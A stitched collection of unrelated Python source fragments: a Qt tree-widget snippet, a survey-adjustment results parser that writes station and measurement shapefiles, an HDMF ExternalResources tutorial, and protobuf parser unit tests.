cnid = TreeItem( node.get_label(object) )
# cnid.setText(0, node.get_label(object))
# cnid.setIcon(0, self._get_icon(node, object))
# cnid.setToolTip(0, node.get_tooltip(object))
has_children = self._has_children(node, object)
self._set_node_data( cnid, ( False, node, object ) )
self._map.setdefault( id( object ), [] ).append(
( node.children, cnid ) )
self._add_listeners( node, object )
# Automatically expand the new node (if requested):
if has_children:
if node.can_auto_open( object ):
cnid.setState( True )
else:
# Qt only draws the control that expands the tree if there is a
# child. | |
{
'Stn1': station1,
'Msr': msr,
'Msr_SD': msr_SD,
'Adj': adj,
'Cor': cor,
'nStat': nStat,
'outlier': Outlier,
'matched': False
}
if msrType == 'R':
r_count += 1
station1 = line[2:22].strip()
flag = line[62:63]
data = line[67:].split()
msr = data[0]
adj = data[1]
cor = data[2]
msr_SD = data[3]
adj_SD = data[4]
res = data[5]
nStat = data[6]
pelzer = data[7]
PreAdjCor = data[8]
Outlier = line[204:205]
r_msrs[r_count] = {
'Stn1': station1,
'Msr': msr,
'Msr_SD': msr_SD,
'Adj': adj,
'Cor': cor,
'nStat': nStat,
'outlier': Outlier,
'matched': False
}
if msrType == 'D':
output = []
d_set += 1
pointing = 0
station1 = line[2:22].strip()
station2 = line[22:42].strip()
d_msrs[d_set] = {
'Stn1': station1,
'Stn2': station2
}
if msrType == ' ':
d_count += 1
pointing += 1
target = line[42:63].strip()
msr = line[72:86].strip()
adj = line[86:105].strip()
cor = line[105:117].strip()
dmsr_SD = line[117:130].strip()
dadj_SD = line[130:143].strip()
dres = line[143:156].strip()
dnStat = line[156:167].strip()
dpelzer = line[167:179].strip()
dPreAdjCor = line[179:193].strip()
doutlier = line[204:205].strip()
d_msrs[d_set][pointing] = {
'target': target,
'msr': msr,
'adj': adj,
'cor': cor,
'msr_SD': dmsr_SD,
'adj_SD': dadj_SD,
'res': dres,
'nStat': dnStat,
'pelzer': dpelzer,
'PreAdjCor': dPreAdjCor,
'outlier': doutlier
}
if line == '\n':
msr_switch = False
continue
if stn_switch:
if len(line) < 20:
stn_switch = False
continue
E = None
N = None
z = None
P = None
L = None
H = None
h = None
# Cartesian coords disabled for now
# X = None
# Y = None
# Z = None
stn = line[0:20].strip()
con = line[20:23]
results = line[25:].split()
r_count = 0
for ct in coord_types:
if ct == 'E':
E = float(results[r_count])
if ct == 'N':
N = float(results[r_count])
if ct == 'z':
z = int(results[r_count])
if ct == 'P':
P = gc.hp2dec(float(results[r_count]))
if ct == 'L':
L = gc.hp2dec(float(results[r_count]))
if ct == 'H':
H = float(results[r_count])
if ct == 'h':
h = float(results[r_count])
# if ct == 'X':
# X = float(results[r_count])
# if ct == 'Y':
# Y = float(results[r_count])
# if ct == 'Z':
# Z = float(results[r_count])
r_count += 1
# Don't forget about the qualities
SD_E = float(results[r_count])
SD_N = float(results[r_count + 1])
SD_U = float(results[r_count + 2])
# Read Station Description
if desc_index is None or desc_index == -1:
Desc = ''
else:
Desc = str(line[desc_index:].strip())
if not E:
ENz = gc.geo2grid(P, L)
E = ENz[2]
N = ENz[3]
z = ENz[1]
stns[stn] = {
'con': con,
'E': E,
'N': N,
'z': z,
'P': P,
'L': L,
'H': H,
'h': h,
'SD_E': SD_E,
'SD_N': SD_N,
'SD_U': SD_U,
'Desc': Desc
}
# projection function
def write_prj(file_name, ref_frame):
if ref_frame == 'GDA2020':
out_str = 'GEOGCS["GDA2020",DATUM["GDA2020",SPHEROID["GRS_1980",6378137.0,298.257222101]],' \
'PRIMEM["Greenwich",0.0],UNIT["Degree",0.0174532925199433],AUTHORITY["EPSG",7844]]'
elif ref_frame == 'GDA94':
out_str = 'GEOGCS["GDA94",DATUM["D_GDA_1994",SPHEROID["GRS_1980",6378137,298.257222101]],' \
'PRIMEM["Greenwich",0],UNIT["Degree",0.017453292519943295]]'
else:
out_str = None
if out_str != None:
prj_fh = open(file_name + '.prj', 'w')
prj_fh.write(out_str)
prj_fh.close()
# ----------------------------------------------------------------------
# write stations
# ----------------------------------------------------------------------
if stns:
print(" writing stn shapefile ...")
write_prj(point_name, ref_frame)
w = shapefile.Writer(point_name, shapeType=1) # type 1 for points.
w.autoBalance = 1
# w.field('ID', 'N')
w.field('Station', 'C', size=20)
w.field('Constraints', 'C', size=3)
w.field('Easting', 'N', decimal=4)
w.field('Northing', 'N', decimal=4)
w.field('Zone', 'N')
w.field('Latitude', 'N', decimal=10)
w.field('Longitude', 'N', decimal=10)
w.field('OHGT', 'N', decimal=4)
w.field('EHGT', 'N', decimal=4)
w.field('SD_E', 'N', decimal=4)
w.field('SD_N', 'N', decimal=4)
w.field('SD_U', 'N', decimal=4)
w.field('Description', 'C', size=20)
for s in stns:
w.point(stns[s]['L'], stns[s]['P'])
w.record(s, str(stns[s]['con']), float(stns[s]['E']), float(stns[s]['N']), int(stns[s]['z']), float(stns[s]['P']),
float(stns[s]['L']), float(stns[s]['H']), float(stns[s]['h']), float(stns[s]['SD_E']),
float(stns[s]['SD_N']), float(stns[s]['SD_U']), str(stns[s]['Desc']))
w.close()
# ----------------------------------------------------------------------
# write h_msrs
# ----------------------------------------------------------------------
if h_msrs:
print(" writing type H msr shapefile ...")
write_prj(h_msr_name, ref_frame)
w = shapefile.Writer(h_msr_name,shapeType=1) # type 1 for points.
w.autoBalance = 1
# w.field('ID', 'N')
w.field('Stn1', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for h in h_msrs:
w.point(stns[h_msrs[h]['Stn1']]['L'], stns[h_msrs[h]['Stn1']]['P'])
w.record(h_msrs[h]['Stn1'], h_msrs[h]['Msr'], h_msrs[h]['Msr_SD'], h_msrs[h]['Adj'],
h_msrs[h]['Cor'], h_msrs[h]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write r_msrs
# ----------------------------------------------------------------------
if r_msrs:
print(" writing type R msr shapefile ...")
write_prj(r_msr_name, ref_frame)
w = shapefile.Writer(r_msr_name, shapeType=1) # type 1 for points.
w.autoBalance = 1
# w.field('ID', 'N')
w.field('Stn1', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for r in r_msrs:
w.point(stns[r_msrs[r]['Stn1']]['L'], stns[r_msrs[r]['Stn1']]['P'])
w.record(r_msrs[r]['Stn1'], r_msrs[r]['Msr'], r_msrs[r]['Msr_SD'], r_msrs[r]['Adj'],
r_msrs[r]['Cor'], r_msrs[r]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write b_msrs
# ----------------------------------------------------------------------
if b_msrs:
print(" writing type B msr shapefile ...")
write_prj(b_msr_name, ref_frame)
w = shapefile.Writer(b_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for b in b_msrs:
lon1 = stns[b_msrs[b]['Stn1']]['L']
lat1 = stns[b_msrs[b]['Stn1']]['P']
lon2 = stns[b_msrs[b]['Stn2']]['L']
lat2 = stns[b_msrs[b]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(b_msrs[b]['Stn1'], b_msrs[b]['Stn2'], b_msrs[b]['Msr'], b_msrs[b]['Msr_SD'], b_msrs[b]['Adj'],
b_msrs[b]['Cor'], b_msrs[b]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write l_msrs
# ----------------------------------------------------------------------
if l_msrs:
print(" writing type L msr shapefile ...")
write_prj(l_msr_name, ref_frame)
w = shapefile.Writer(l_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for l in l_msrs:
lon1 = stns[l_msrs[l]['Stn1']]['L']
lat1 = stns[l_msrs[l]['Stn1']]['P']
lon2 = stns[l_msrs[l]['Stn2']]['L']
lat2 = stns[l_msrs[l]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(l_msrs[l]['Stn1'], l_msrs[l]['Stn2'], l_msrs[l]['Msr'], l_msrs[l]['Msr_SD'], l_msrs[l]['Adj'],
l_msrs[l]['Cor'], l_msrs[l]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write e_msrs
# ----------------------------------------------------------------------
if e_msrs:
print(" writing type E msr shapefile ...")
write_prj(e_msr_name, ref_frame)
w = shapefile.Writer(e_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for e in e_msrs:
lon1 = stns[e_msrs[e]['Stn1']]['L']
lat1 = stns[e_msrs[e]['Stn1']]['P']
lon2 = stns[e_msrs[e]['Stn2']]['L']
lat2 = stns[e_msrs[e]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(e_msrs[e]['Stn1'], e_msrs[e]['Stn2'], e_msrs[e]['Msr'], e_msrs[e]['Msr_SD'], e_msrs[e]['Adj'],
e_msrs[e]['Cor'], e_msrs[e]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write m_msrs
# ----------------------------------------------------------------------
if m_msrs:
print(" writing type M msr shapefile ...")
write_prj(m_msr_name, ref_frame)
w = shapefile.Writer(m_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr', 'N', decimal=4)
w.field('StdDev', 'N', decimal=4)
w.field('adj', 'N', decimal=4)
w.field('cor', 'N', decimal=4)
w.field('nStat', 'N', decimal=4)
for m in m_msrs:
lon1 = stns[m_msrs[m]['Stn1']]['L']
lat1 = stns[m_msrs[m]['Stn1']]['P']
lon2 = stns[m_msrs[m]['Stn2']]['L']
lat2 = stns[m_msrs[m]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(m_msrs[m]['Stn1'], m_msrs[m]['Stn2'], m_msrs[m]['Msr'], m_msrs[m]['Msr_SD'], m_msrs[m]['Adj'],
m_msrs[m]['Cor'], m_msrs[m]['nStat'])
w.close()
# ----------------------------------------------------------------------
# write g_msrs
# ----------------------------------------------------------------------
if g_msrs:
print(" writing type G msr shapefile ...")
write_prj(g_msr_name, ref_frame)
w = shapefile.Writer(g_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr_X', 'N', decimal=4)
w.field('msr_Y', 'N', decimal=4)
w.field('msr_Z', 'N', decimal=4)
w.field('StdDev_X', 'N', decimal=4)
w.field('StdDev_Y', 'N', decimal=4)
w.field('StdDev_Z', 'N', decimal=4)
w.field('adj_X', 'N', decimal=4)
w.field('adj_Y', 'N', decimal=4)
w.field('adj_Z', 'N', decimal=4)
w.field('cor_X', 'N', decimal=4)
w.field('cor_Y', 'N', decimal=4)
w.field('cor_Z', 'N', decimal=4)
w.field('max_cor', 'N', decimal=4)
w.field('nStat_X', 'N', decimal=4)
w.field('nStat_Y', 'N', decimal=4)
w.field('nStat_Z', 'N', decimal=4)
w.field('max_nStat', 'N', decimal=4)
for g in g_msrs:
lon1 = stns[g_msrs[g]['Stn1']]['L']
lat1 = stns[g_msrs[g]['Stn1']]['P']
lon2 = stns[g_msrs[g]['Stn2']]['L']
lat2 = stns[g_msrs[g]['Stn2']]['P']
w.line([
[[lon1, lat1],[lon2, lat2]]
])
w.record(g_msrs[g]['Stn1'], g_msrs[g]['Stn2'],
g_msrs[g]['Msr_X'], g_msrs[g]['Msr_Y'], g_msrs[g]['Msr_Z'],
g_msrs[g]['Msr_SD_X'], g_msrs[g]['Msr_SD_Y'], g_msrs[g]['Msr_SD_Z'],
g_msrs[g]['Adj_X'], g_msrs[g]['Adj_Y'], g_msrs[g]['Adj_Z'],
g_msrs[g]['Cor_X'], g_msrs[g]['Cor_Y'], g_msrs[g]['Cor_Z'], g_msrs[g]['Max_Cor'],
g_msrs[g]['nStat_X'], g_msrs[g]['nStat_Y'], g_msrs[g]['nStat_Z'], g_msrs[g]['Max_nStat']
)
w.close()
# ----------------------------------------------------------------------
# write x_msrs
# ----------------------------------------------------------------------
if x_msrs:
print(" writing type X msr shapefile ...")
write_prj(x_msr_name, ref_frame)
w = shapefile.Writer(x_msr_name, shapeType=3) # type 3 for polylines.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
w.field('Stn2', 'C', size=20)
w.field('msr_X', 'N', decimal=4)
w.field('msr_Y', 'N', decimal=4)
w.field('msr_Z', 'N', decimal=4)
w.field('StdDev_X', 'N', decimal=4)
w.field('StdDev_Y', 'N', decimal=4)
w.field('StdDev_Z', 'N', decimal=4)
w.field('adj_X', 'N', decimal=4)
w.field('adj_Y', 'N', decimal=4)
w.field('adj_Z', 'N', decimal=4)
w.field('cor_X', 'N', decimal=4)
w.field('cor_Y', 'N', decimal=4)
w.field('cor_Z', 'N', decimal=4)
w.field('max_cor', 'N', decimal=4)
w.field('nStat_X', 'N', decimal=4)
w.field('nStat_Y', 'N', decimal=4)
w.field('nStat_Z', 'N', decimal=4)
w.field('max_nStat', 'N', decimal=4)
for x in x_msrs:
lon1 = stns[x_msrs[x]['Stn1']]['L']
lat1 = stns[x_msrs[x]['Stn1']]['P']
lon2 = stns[x_msrs[x]['Stn2']]['L']
lat2 = stns[x_msrs[x]['Stn2']]['P']
w.line([
[[lon1, lat1], [lon2, lat2]]
])
w.record(x_msrs[x]['Stn1'], x_msrs[x]['Stn2'],
x_msrs[x]['Msr_X'], x_msrs[x]['Msr_Y'], x_msrs[x]['Msr_Z'],
x_msrs[x]['Msr_SD_X'], x_msrs[x]['Msr_SD_Y'], x_msrs[x]['Msr_SD_Z'],
x_msrs[x]['Adj_X'], x_msrs[x]['Adj_Y'], x_msrs[x]['Adj_Z'],
x_msrs[x]['Cor_X'], x_msrs[x]['Cor_Y'], x_msrs[x]['Cor_Z'], x_msrs[x]['Max_Cor'],
x_msrs[x]['nStat_X'], x_msrs[x]['nStat_Y'], x_msrs[x]['nStat_Z'], x_msrs[x]['Max_nStat']
)
w.close()
# ----------------------------------------------------------------------
# write y_msrs
# ----------------------------------------------------------------------
if y_msrs:
print(" writing type Y msr shapefile ...")
write_prj(y_msr_name, ref_frame)
w = shapefile.Writer(y_msr_name, shapeType=1) # type 1 for points.
w.autoBalance = 1
w.field('Stn1', 'C', size=20)
# w.field('Stn2', 'C', size=20)
w.field('msr_X', 'N', decimal=4)
w.field('msr_Y', 'N', decimal=4)
w.field('msr_Z', 'N', decimal=4)
w.field('StdDev_X', 'N', decimal=4)
w.field('StdDev_Y', 'N', decimal=4)
w.field('StdDev_Z', 'N', decimal=4)
w.field('adj_X', 'N', decimal=4)
w.field('adj_Y', 'N', decimal=4)
w.field('adj_Z', 'N', decimal=4)
w.field('cor_X', 'N', decimal=4)
w.field('cor_Y', 'N', decimal=4)
| |
"""
ExternalResources
=============================
This is a user guide to interacting with the ``ExternalResources`` class.
The ExternalResources type is experimental and is subject to change in future releases.
If you use this type, please provide feedback to the HDMF team so that we can
improve the structure and access of data stored with this type for your use cases.
"""
###############################################################################
# Introduction
# ------------------------------------------------------
# The :py:class:`~hdmf.common.resources.ExternalResources` class provides a way
# to organize and map user terms (keys) to multiple resources and entities
# from the resources. A typical use case for external resources is to link data
# stored in datasets or attributes to ontologies. For example, you may have a
# dataset ``country`` storing locations. Using
# :py:class:`~hdmf.common.resources.ExternalResources` allows us to link the
# country names stored in the dataset to an ontology of all countries, enabling
# more rigid standardization of the data and facilitating data query and
# introspection.
#
# From a user's perspective, one can think of the ``ExternalResources`` as a
# simple table, in which each row associates a particular ``key`` stored in a
# particular ``object`` (i.e., Attribute or Dataset in a file) with a particular
# ``entity`` (e.g., a term) of an online ``resource`` (e.g., an ontology).
# That is, ``(object, key)`` refer to parts inside a file and ``(resource, entity)``
# refer to an external resource outside of the file, and ``ExternalResources``
# allows us to link the two. To reduce data redundancy and improve data integrity,
# ``ExternalResources`` stores this data internally in a collection of
# interlinked tables.
#
# * :py:class:`~hdmf.common.resources.KeyTable` where each row describes a
# :py:class:`~hdmf.common.resources.Key`
# * :py:class:`~hdmf.common.resources.ResourceTable` where each row describes a
# :py:class:`~hdmf.common.resources.Resource`
# * :py:class:`~hdmf.common.resources.EntityTable` where each row describes an
# :py:class:`~hdmf.common.resources.Entity`
# * :py:class:`~hdmf.common.resources.ObjectTable` where each row descibes an
# :py:class:`~hdmf.common.resources.Object`
# * :py:class:`~hdmf.common.resources.ObjectKeyTable` where each row describes an
# :py:class:`~hdmf.common.resources.ObjectKey` pair identifying which keys
# are used by which objects.
#
# The :py:class:`~hdmf.common.resources.ExternalResources` class then provides
# convenience functions to simplify interaction with these tables, allowing users
# to treat ``ExternalResources`` as a single large table as much as possible.
###############################################################################
# Rules to ExternalResources
# ------------------------------------------------------
# When using the :py:class:`~hdmf.common.resources.ExternalResources` class, there
# are rules to how users store information in the interlinked tables.
#
# 1. Multiple :py:class:`~hdmf.common.resources.Key` objects can have the same name.
# They are disambiguated by the :py:class:`~hdmf.common.resources.Object` associated
# with each. I.e., we may have keys with the same name in different objects, but for a particular object
# all keys must be unique. This means the :py:class:`~hdmf.common.resources.KeyTable` may contain
# duplicate entries, but the :py:class:`~hdmf.common.resources.ObjectKeyTable` then must not assign
# duplicate keys to the same object.
# 2. In order to query specific records, the :py:class:`~hdmf.common.resources.ExternalResources` class
# uses '(object_id, relative_path, field, Key)' as the unique identifier.
# 3. :py:class:`~hdmf.common.resources.Object` can have multiple :py:class:`~hdmf.common.resources.Key`
# objects.
# 4. Multiple :py:class:`~hdmf.common.resources.Object` objects can use the same :py:class:`~hdmf.common.resources.Key`.
# Note that the :py:class:`~hdmf.common.resources.Key` may already be associated with resources
# and entities.
# 5. Do not use the private methods to add into the :py:class:`~hdmf.common.resources.KeyTable`,
# :py:class:`~hdmf.common.resources.ResourceTable`, :py:class:`~hdmf.common.resources.EntityTable`,
# :py:class:`~hdmf.common.resources.ObjectTable`, :py:class:`~hdmf.common.resources.ObjectKeyTable`
# individually.
# 6. URIs are optional, but highly recommended. If not known, an empty string may be used.
# 7. An entity ID should be the unique string identifying the entity in the given resource.
# This may or may not include a string representing the resource and a colon.
# Use the format provided by the resource. For example, Identifiers.org uses the ID ``ncbigene:22353``
# but the NCBI Gene uses the ID ``22353`` for the same term.
# 8. In a majority of cases, :py:class:`~hdmf.common.resources.Object` objects will have an empty string
# for 'field'. The :py:class:`~hdmf.common.resources.ExternalResources` class supports compound data_types.
# In that case, 'field' would be the field of the compound data_type that has an external reference.
# 9. In some cases, the attribute that needs an external reference is not a object with a 'data_type'.
# The user must then use the nearest object that has a data type to be used as the parent object. When
# adding an external resource for an object with a data type, users should not provide an attribute.
# When adding an external resource for an attribute of an object, users need to provide
# the name of the attribute.
###############################################################################
# Creating an instance of the ExternalResources class
# ------------------------------------------------------
# sphinx_gallery_thumbnail_path = 'figures/gallery_thumbnail_externalresources.png'
from hdmf.common import ExternalResources
from hdmf.common import DynamicTable
from hdmf import Data
import numpy as np
# Ignore experimental feature warnings in the tutorial to improve rendering
import warnings
warnings.filterwarnings("ignore", category=UserWarning, message="ExternalResources is experimental*")
er = ExternalResources(name='example')
###############################################################################
# Using the add_ref method
# ------------------------------------------------------
# :py:func:`~hdmf.common.resources.ExternalResources.add_ref`
# is a wrapper function provided by the ``ExternalResources`` class that
# simplifies adding data. Using ``add_ref`` allows us to treat new entries similar
# to adding a new row to a flat table, with ``add_ref`` taking care of populating
# the underlying data structures accordingly.
data = Data(name="species", data=['Homo sapiens', 'Mus musculus'])
er.add_ref(
container=data,
key='Homo sapiens',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid9606',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=9606'
)
key, resource, entity = er.add_ref(
container=data,
key='Mus musculus',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid10090',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=10090'
)
# Print result from the last add_ref call
print(key)
print(resource)
print(entity)
###############################################################################
# Using the add_ref method with get_resource
# ------------------------------------------------------
# When adding references to resources, you may want to refer to multiple entities
# within the same resource. Resource names are unique, so if you call ``add_ref``
# with the name of an existing resource, then that resource will be reused. You
# can also use the :py:func:`~hdmf.common.resources.ExternalResources.get_resource`
# method to get the ``Resource`` object and pass that in to ``add_ref`` to
# reuse an existing resource.
# Let's create a new instance of ExternalResources.
er = ExternalResources(name='example')
data = Data(name="species", data=['Homo sapiens', 'Mus musculus'])
er.add_ref(
container=data,
key='Homo sapiens',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid9606',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=9606'
)
# Using get_resource
existing_resource = er.get_resource('NCBI_Taxonomy')
er.add_ref(
container=data,
key='Mus musculus',
resources_idx=existing_resource,
entity_id='NCBI:txid10090',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=10090'
)
###############################################################################
# Using the add_ref method with get_resource
# ------------------------------------------------------
# When adding references to resources, you may want to refer to multiple entities
# within the same resource. Resource names are unique, so if you call ``add_ref``
# with the name of an existing resource, then that resource will be reused. You
# can also use the :py:func:`~hdmf.common.resources.ExternalResources.get_resource`
# method to get the ``Resource`` object and pass that in to ``add_ref`` to
# reuse an existing resource.
# Let's create a new instance of ExternalResources.
er = ExternalResources(name='example')
data = Data(name="species", data=['Homo sapiens', 'Mus musculus'])
er.add_ref(
container=data,
field='',
key='Homo sapiens',
resource_name='NCBI_Taxonomy',
resource_uri='https://www.ncbi.nlm.nih.gov/taxonomy',
entity_id='NCBI:txid9606',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=9606')
# Using get_resource
existing_resource = er.get_resource('NCBI_Taxonomy')
er.add_ref(
container=data,
field='',
key='Mus musculus',
resources_idx=existing_resource,
entity_id='NCBI:txid10090',
entity_uri='https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?id=10090')
###############################################################################
# Using the add_ref method with a field
# ------------------------------------------------------
# It is important to keep in mind that when adding and :py:class:~hdmf.common.resources.Object`` to
# the :py:class:~hdmf.common.resources.ObjectTable, the parent object identified by
# :py:class:~hdmf.common.resources.Object.object_id must be the closest parent to the target object
# (i.e., :py:class:~hdmf.common.resources.Object.relative_pathmust be the shortest possible path and
# as such cannot contain any objects with adata_typeand associatedobject_id`).
# A common example would be with the :py:class:`~hdmf.common.table.DynamicTable` class, which holds
# :py:class:`~hdmf.common.table.VectorData` objects as columns. If we wanted to add an external
# reference on a column from a :py:class:`~hdmf.common.table.DynamicTable`, then we would use the
# column as the object and not the :py:class:`~hdmf.common.table.DynamicTable` (Refer to rule 9).
# Note: :py:func:`~hdmf.common.resources.ExternalResources.add_ref` internally resolves the object
# to the closest parent, so that er.add_ref(container=genotypes, attribute='genotype_name') and
# er.add_ref(container=genotypes.genotype_name, attribute=None) will ultimatly both use the object_id
# of the genotypes.genotype_name VectorData column and not the object_id of the genotypes table.
genotypes = DynamicTable(name='genotypes', description='My genotypes')
genotypes.add_column(name='genotype_name', description="Name of genotypes")
genotypes.add_row(id=0, genotype_name='Rorb')
er.add_ref(
container=genotypes,
attribute='genotype_name',
key='Rorb',
resource_name='MGI Database',
resource_uri='http://www.informatics.jax.org/',
entity_id='MGI:1346434',
entity_uri='http://www.informatics.jax.org/marker/MGI:1343464'
)
###############################################################################
# Using the get_keys method
# ------------------------------------------------------
# The :py:func:`~hdmf.common.resources.ExternalResources.get_keys` method
# returns a :py:class:`~pandas.DataFrame` of ``key_name``, ``resource_table_idx``, ``entity_id``,
# and ``entity_uri``. You can either pass a single key object,
# a list of key objects, or leave the input parameters empty to return all.
# All Keys
er.get_keys()
# Single Key
er.get_keys(keys=er.get_key('Homo sapiens'))
# List of Specific Keys
er.get_keys(keys=[er.get_key('Homo sapiens'), er.get_key('Mus musculus')])
###############################################################################
# Using the get_key method
# ------------------------------------------------------
# The :py:func:`~hdmf.common.resources.ExternalResources.get_key`
# method will return a ``Key`` object. In the current version of ``ExternalResources``,
# duplicate keys are allowed; however, each key needs a unique linking Object.
# In other words, each combination of (container, relative_path, field, key) can exist only once in
# ``ExternalResources``.
# The get_key method will return the key object of the unique (key, container, relative_path, field).
key_object = er.get_key(key_name='Rorb', container=genotypes.columns[0])
###############################################################################
# Using the add_ref method with a key_object
# ------------------------------------------------------
# Multiple :py:class:`~hdmf.common.resources.Object` objects can use the same
# :py:class:`~hdmf.common.resources.Key`. To use an existing key when adding
# new entries into ``ExternalResources``, pass the :py:class:`~hdmf.common.resources.Key`
# object instead of the 'key_name' to the ``add_ref`` method. If a 'key_name' is used,
# a new Key will | |
test_nesting_in_message():
proto = """
|message FieldOptions {
| optional CType ctype = 1[old_default = STRING, deprecated = true];
| enum CType {
| STRING = 0[(opt_a) = 1, (opt_b) = 2];
| };
| // Clients can define custom options in extensions of this message. See above.
| extensions 500;
| extensions 1000 to max;
|}
"""
proto = trim_margin(proto)
enum_element = EnumElement(
location=location.at(3, 3),
name="CType",
constants=[
EnumConstantElement(
location=location.at(4, 5),
name="STRING",
tag=0,
options=[
OptionElement("opt_a", OptionElement.Kind.NUMBER, "1", True),
OptionElement("opt_b", OptionElement.Kind.NUMBER, "2", True)
]
)
],
)
field = FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="CType",
name="ctype",
tag=1,
options=[
OptionElement("old_default", OptionElement.Kind.ENUM, "STRING"),
OptionElement("deprecated", OptionElement.Kind.BOOLEAN, "true")
]
)
assert len(field.options) == 2
assert OptionElement("old_default", OptionElement.Kind.ENUM, "STRING") in field.options
assert OptionElement("deprecated", OptionElement.Kind.BOOLEAN, "true") in field.options
message_element = MessageElement(
location=location.at(1, 1),
name="FieldOptions",
fields=[field],
nested_types=[enum_element],
extensions=[
ExtensionsElement(
location=location.at(7, 3),
documentation="Clients can define custom options in extensions of this message. See above.",
values=[500]
),
ExtensionsElement(location.at(8, 3), "", [KotlinRange(1000, MAX_TAG_VALUE)])
]
)
expected = ProtoFileElement(location=location, types=[message_element])
actual = ProtoParser.parse(location, proto)
assert actual == expected
def test_multi_ranges_extensions():
proto = """
|message MeGustaExtensions {
| extensions 1, 5 to 200, 500, 1000 to max;
|}
"""
proto = trim_margin(proto)
message_element = MessageElement(
location=location.at(1, 1),
name="MeGustaExtensions",
extensions=[
ExtensionsElement(
location=location.at(2, 3), values=[1] + [KotlinRange(5, 200)] + [500] + [KotlinRange(1000, MAX_TAG_VALUE)]
)
]
)
expected = ProtoFileElement(location=location, types=[message_element])
actual = ProtoParser.parse(location, proto)
assert actual == expected
def test_option_parentheses():
proto = """
|message Chickens {
| optional bool koka_ko_koka_ko = 1[old_default = true];
| optional bool coodle_doodle_do = 2[(delay) = 100, old_default = false];
| optional bool coo_coo_ca_cha = 3[old_default = true, (delay) = 200];
| optional bool cha_chee_cha = 4;
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
types=[
MessageElement(
location=location.at(1, 1),
name="Chickens",
fields=[
FieldElement(
location=location.at(2, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="koka_ko_koka_ko",
tag=1,
options=[OptionElement("old_default", OptionElement.Kind.BOOLEAN, "true")]
),
FieldElement(
location=location.at(3, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="coodle_doodle_do",
tag=2,
options=[
OptionElement("delay", OptionElement.Kind.NUMBER, "100", True),
OptionElement("old_default", OptionElement.Kind.BOOLEAN, "false")
]
),
FieldElement(
location=location.at(4, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="coo_coo_ca_cha",
tag=3,
options=[
OptionElement("old_default", OptionElement.Kind.BOOLEAN, "true"),
OptionElement("delay", OptionElement.Kind.NUMBER, "200", True)
]
),
FieldElement(
location=location.at(5, 3),
label=Field.Label.OPTIONAL,
element_type="bool",
name="cha_chee_cha",
tag=4
)
]
)
]
)
assert ProtoParser.parse(location, proto) == expected
def test_imports():
proto = "import \"src/test/resources/unittest_import.proto\";\n"
expected = ProtoFileElement(location=location, imports=["src/test/resources/unittest_import.proto"])
assert ProtoParser.parse(location, proto) == expected
def test_public_imports():
proto = "import public \"src/test/resources/unittest_import.proto\";\n"
expected = ProtoFileElement(location=location, public_imports=["src/test/resources/unittest_import.proto"])
assert ProtoParser.parse(location, proto) == expected
def test_extend():
proto = """
|// Extends Foo
|extend Foo {
| optional int32 bar = 126;
|}
"""
proto = trim_margin(proto)
expected = ProtoFileElement(
location=location,
extend_declarations=[
ExtendElement(
location=location.at(2, 1),
name="Foo",
documentation="Extends Foo",
fields=[
FieldElement(
location=location.at(3, 3), label=Field.Label.OPTIONAL, element_type="int32", name="bar", tag=126
)
]
